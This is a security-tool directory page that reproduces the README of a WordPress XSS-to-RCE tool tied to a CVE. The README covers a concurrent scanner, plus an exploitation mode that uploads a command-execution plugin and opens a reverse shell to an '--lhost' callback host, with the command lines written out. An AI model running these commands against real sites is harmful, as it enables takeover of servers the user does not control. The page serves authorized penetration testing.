Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
XSS2Shell-CVE-2026-64638 — Authorized WordPress XSS-to-RCE scanner with concurrent multi-target XSS reflection and version fingerprint detection, plus optional exploitation workflow. | Kitploit
도구/GitHubGitHub/yogagymn/xss2shell-cve-2026-64638
ReconnaissanceWeb Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHub

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
yogagymn/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

Authorized WordPress XSS-to-RCE scanner with concurrent multi-target XSS reflection and version fingerprint detection, plus optional exploitation workflow.

저장소 보기
1202개월 전아직 검토되지 않음
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.

XSS2Shell Multi-Target Scanner

Developer: YogaGymn

PoC/scanning utility for authorized WordPress security testing. The project contains a single-target exploitation workflow and a concurrent multi-target scan-only mode.

Important: Use this project only on WordPress installations that you own or have explicit authorization to test. The multi-target scanner is intentionally limited to fingerprinting and XSS reflection detection; it does not perform credential capture, plugin upload, or RCE against a target list.

Features

Single-target mode

The original script supports:

  • WordPress version fingerprinting.
  • XSS reflection detection.
  • auto, xss, and direct modes.
  • Direct WordPress authentication and plugin upload workflow.
  • XSS-chain functionality present in the original PoC.
  • Optional callback/reverse-shell functionality present in the original PoC.

Multi-target mode

The added scanner supports:

  • Reading targets from a text file.
  • Removing duplicate targets.
  • Concurrent scanning with ThreadPoolExecutor.
  • Configurable worker count.
  • WordPress version detection.
  • XSS reflection detection.
  • Progress reporting.
  • Results saved in the same order as the input file.
  • Summary statistics.

The multi-target mode does not call the original RCE functions.

Requirements

  • Python 3.9+
  • requests

Install the dependency:

python3 -m pip install requests

If your Linux distribution uses an externally managed Python environment, use a virtual environment:

python3 -m venv .venv
source .venv/bin/activate
pip install requests

Installation

Clone or copy the project:

git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

Or simply place:

xss2shell.py

in your working directory.

Multi-Target Scanner

Create a file named targets.txt:

https://example1.test
https://example2.test
https://example3.test

Comments and empty lines are ignored:

# Authorized lab targets
https://example1.test

https://example2.test

Run the scanner:

python3 xss2shell.py -i targets.txt

Default concurrency is 10 workers.

Change concurrency

For example, use 20 workers:

python3 xss2shell.py -i targets.txt --workers 20

For a small lab:

python3 xss2shell.py -i targets.txt --workers 5

Do not choose an unnecessarily high worker count because it can increase connection load and may trigger rate limiting or defensive controls.

Change output file

python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

Example Output

[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

Result Format

The default scan_results.txt uses tab-separated fields:

TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

Example:

https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

XSS status values


Status Meaning


XSS_REFLECTION_DETECTED The scanner detected the tested HTML reflection behavior. This is not by itself proof of RCE.

XSS_NOT_DETECTED The tested reflection was not detected.

ERROR The check encountered an exception.

XSS detail values

The scanner can report details such as:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

These values describe the response observed by the detection routine; they should be manually validated before treating a result as a confirmed vulnerability.

Single-Target Usage

The original script also supports single-target arguments.

Auto mode

python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

Direct mode

python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

XSS mode

python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

The XSS/direct workflows can create or activate a plugin containing command-execution functionality. Use them only inside an authorized test environment.

CLI Reference

usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

Arguments


Argument Description


target Single target URL.

-i, --input File containing multiple targets.

--output Output file for multi-target results. Default: scan_results.txt.

--workers Number of concurrent workers. Default: 10.

--mode Original single-target mode: auto, xss, or direct.

-u, --username WordPress username for the original direct/fallback workflow.

-p, --password WordPress password for the original direct/fallback workflow.

--lhost Callback/reverse-shell host for the original PoC.

--lport Reverse-shell port. Default: 4444.

--slug Plugin slug. Default: xss2shell.

--callback-port Callback server port. Default: 9090.

--no-rev Skip reverse-shell triggering in the original workflow.

How Concurrent Scanning Works

The multi-target mode uses Python's:

ThreadPoolExecutor

Each target is submitted as an independent scanning task:

targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

Results are collected as workers finish, while the final output is written according to the original target order.

Scope and Safety

도구 다운로드